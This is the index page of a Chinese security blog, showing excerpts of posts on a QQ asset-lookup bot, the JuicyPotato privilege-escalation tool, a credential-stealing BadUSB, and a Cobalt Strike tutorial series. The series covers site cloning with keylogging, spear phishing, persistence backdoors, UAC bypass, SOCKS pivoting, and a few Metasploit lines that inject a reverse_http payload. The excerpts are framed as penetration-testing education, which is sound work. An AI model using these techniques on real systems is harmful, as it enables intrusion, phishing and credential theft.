J0o1ey's blog

Home

About

Archives

loading..
安全开发

实现资产搜集QQ机器人

0x01命令及功能演示之前为一个论坛写了个文章机器人,最近加上了子域名查询和资产搜集功能(用的自己的付费接口) 加上这两个功能希望可以方便大家渗透测试和学习使用 原本希望写一个QQ渗透机器人编写系列的。。但是介于比较合规性上比较敏感和最近缺乏时间,日后再动工 本机器人QQ号为3609079527,申请添加好友后,机器人自动同意,自动同意加群 欢迎各位群主/群管/安全爱好者拉入群中使用(只回复群里) 拉入群中后,输入命令“帮助”即可查看使用方法 目前支持的命令有 最新文章 最热文章 搜索 xxx 资产查询 xxx 子域名查询 xxx 0x02演示#资产查询# 子域名查询# 其他功能在此不过多演示,请各位自行体验

Read more
loading..
安全工具

微软不当洞的漏洞-Windows提权神器JuicyPotato

0X00-Juicy-Potato简介Juicy Potato江湖人称烂土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM*) 追根到底是一款Windows的本地提权工具,利用了COM对象进行提权,相比RottenPotatoNG适用范围更加广泛(正如作者所说with a bit of juice) 使用Juicy Potato这款提权工具的前提是获得了SeIm..

Read more
loading..
硬件安全

浅记Badusb窃取凭据的详细制作过程

0x01-简介1.概述在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。 2.Badusb内部结构从这张图便可以了解到–Badusb和普通的U盘并没有什么两样,因此迷惑性极高,很容易攻击成功 3.Badusb Hid攻击原理HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,..

Read more
loading..
安全工具

Cobaltstrike系列教程(十四)网站克隆与邮件鱼叉钓鱼

0x01-前言亲们,这篇是cobaltstrike系列教程的最后一篇啦~写这套教程,我足足写了一个周,还是非常疲惫的,但是想到大家可以从中收获一些东西,便又充满了力量。 这个浮躁的时代,很少有人会静下心来学习与分享,我也是浮躁的一员,但也想为这个圈子留下点东西,因此决定平时多写一些文章供大家阅读。 0x02-网站克隆菜单栏,攻击–>钓鱼攻击–>克隆网站根据你的个人需求,填写克隆网址,主机地址,和你的端口,注意端口不要冲突记得把键盘记录打开如图,我们成功克隆出一个百度 随后我们在,视图–>web日志中查看相关信息如图,一位不知名的用户在该页面输入了J0o1ey dashuaibi 0x03-邮件鱼叉钓鱼使用 攻击–>邮件钓鱼 targets 发送的目标信息 格式 xxxx@xxx.co..

Read more
loading..
安全工具

Cobaltstrike系列教程(十三)控制持久化

0x01-右键菜单实现控制持久化在windows中,拿到目标主机权限后,,维持权限是必不可少的工作。目前常见的手法有: 1.注册表 2.启动项 3.计时任务 4.设置服务 5.shift后门 6.dll劫持(白加黑) 7.利用其他安装的软件 在我之前给出的插件中,已经包含了控制持久化的插件如图,里面包含了很多控制持久化的方法,可自动执行 前几个Persist(※)貌似都是劫持关键程序的dll实现控制持久化 Sticky Keys是大家熟悉的粘滞键后门(shift后门,摁五下shift弹出cmd窗口) Scheduled Job方法为写计划任务维持权限 利用这个菜单实现控制持久化虽然方便,但是存在一定的局限,也有很多问题,下面简单讲两种个人常用的维持权限的方法 0x02-Windows Service维持权..

Read more
loading..
安全工具

Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转

0x01-Cobaltstrike与MSF会话互转①Metasploit派生shell给Cobaltstrike首先,你需要拿到一个metepreter会话,本例中session为1Cobaltstrike的teamserver的ip为8.8.8.8,http监听器端口为4555 msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(payload_inject) > set DisablePayloadHandler true msf ex..

Read more
loading..
安全工具

Cobaltstrike系列教程(十一)提权与横向移动

0x001-提权1.右键菜单提权:选择beacon,右键,执行–>提权我由于加载了插件,所以比官方多了几种提权方式插件下载请看我之前的帖子 ms14-058/ms15-051/ms16-016/ms16-032这些都是大家耳熟能详的Windows本地提权漏洞,在此插件中都已经集成 UAC-DLL这是一种绕过UAC的攻击,它试图将本地管理员运行的有效负载从低权限提升到高权限。此攻击使用UAC漏洞将ArtifactKit生成的DLL复制到特权位置。此攻击适用于Windows7和Windows8及更高版本的未修补版本。 uac-token-duplication这是另一种绕过UAC的攻击,将其从低权限提升到高权限(作为本地管理员)。这种攻击使用一个UAC漏洞,允许非提升进程使用..

Read more
loading..
安全工具

Cobaltstrike系列教程(十)安装扩展

0x001-扩展的加载扩展是Cobaltstrike一个极为重要的模块,它有效地丰盈了cobaltstrike的功能选择菜单栏的CobaltStrike–>脚本管理器,点击load,然后选择cna扩展文件即可,旁边的unload为去除该扩展,,reload为重新加载该扩展 0x002-个人常用扩展本人在此放出几个自己常用的扩展,老哥们可以回复下载 0x003-其他扩展汇总(来自WBG老哥)脚本名称:elevate.cna脚本功能:增加五种提权方式 脚本名称:ProcessTree.cna脚本功能:让ps命令可以显示父子关系并显示颜色 脚本名称:CVE-2018-4878.cna脚本功能:CVE-2018-4878.cna 脚本名称:ArtifactPayloadGenerator.cna脚本功能:创..

Read more
loading..
安全工具

Cobaltstrike系列教程(九)内置Socks与神器EW

0x01-Socks概念目前利用网络防火墙将组织内部的网络结构与外部网络如 INTERNET 中有效地隔离开来,这种方法正变得逐渐流行起来。这些防火墙系统通常以应用层网关的形式工作在网络之间,提供受控的 TELNET 、 FTP 、 SMTP 等的接入。 SOCKS 提供一个通用框架来使这些协议安全透明地穿过防火墙。说的简单明了一点,在渗透测试中,我们使用socks技术,可以穿透进入目标机的内网,从而扩大我们的战果 0x002-Cobaltstrike自带Socks功能选择一个beacon,右键,中转–>SOCKS Server,或使用命令socks [port] 弹出一个窗口,按要求配置好代理端口 如图,成功开启socks 4,连接我们teamserver的5126端口,即可进入目标机内网~ 0x0..

Read more
loading..
安全工具

Cobaltstrike系列教程(八)截图与浏览器代理

0x01-截图选择一个beacon,右键,目标–>屏幕截图然后点击菜单栏上的“屏幕截图”按钮,如图,成功查看到截图 0x02-浏览器代理选择一个beacon,右键,目标–>浏览器代理配置好相关的端口信息后,点击开始,即可使用目标机的指定端口作为浏览器代理随后cobaltstrike就会注入浏览器代理dll到进程中,我们通过配置我们服务器的IP,端口(本例中为123.207.x/x),即可使用目标机作为浏览器代理

Read more
123456